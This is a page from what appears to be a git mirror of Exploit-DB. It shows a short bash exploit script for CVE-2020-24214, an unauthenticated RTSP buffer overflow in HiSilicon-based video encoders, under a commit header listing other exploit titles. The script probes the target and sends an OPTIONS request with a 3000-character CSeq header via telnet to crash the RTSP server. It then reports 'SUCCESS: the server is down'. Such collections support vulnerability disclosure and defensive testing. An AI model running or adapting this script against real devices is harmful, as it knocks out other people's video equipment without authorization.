bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/48903.sh
Offensive Security ae14b71248 DB: 2020-10-20 
16 changes to exploits/shellcodes

Tourism Management System 1.0 - Arbitrary File Upload
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
Online Discussion Forum Site 1.0 - XSS in Messaging System
Online Job Portal 1.0 - Cross Site Scripting (Stored)
HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal
HiSilicon Video Encoders - RCE via unauthenticated command injection
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
HiSilicon Video Encoders - Full admin access via backdoor password
HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)
Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)
Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)
Textpattern CMS 4.6.2 - Cross-site Request Forgery
2020-10-20 05:02:13 +00:00

43 lines
No EOL
1.1 KiB
Bash
Executable file
Raw Blame History

#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "usage: $0 <server> <RTSP port>"
exit 1
fi
server=$1
port=$2
printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
|| { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"
cseq=$(printf "0%0.s" {1..3000})
printf "sending the payload... "
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"
sleep 1
printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
echo "ERROR: the RTSP server still seems to be running :("
else
echo "SUCCESS: the server is down"
fi
Reference in a new issue View git blame Copy permalink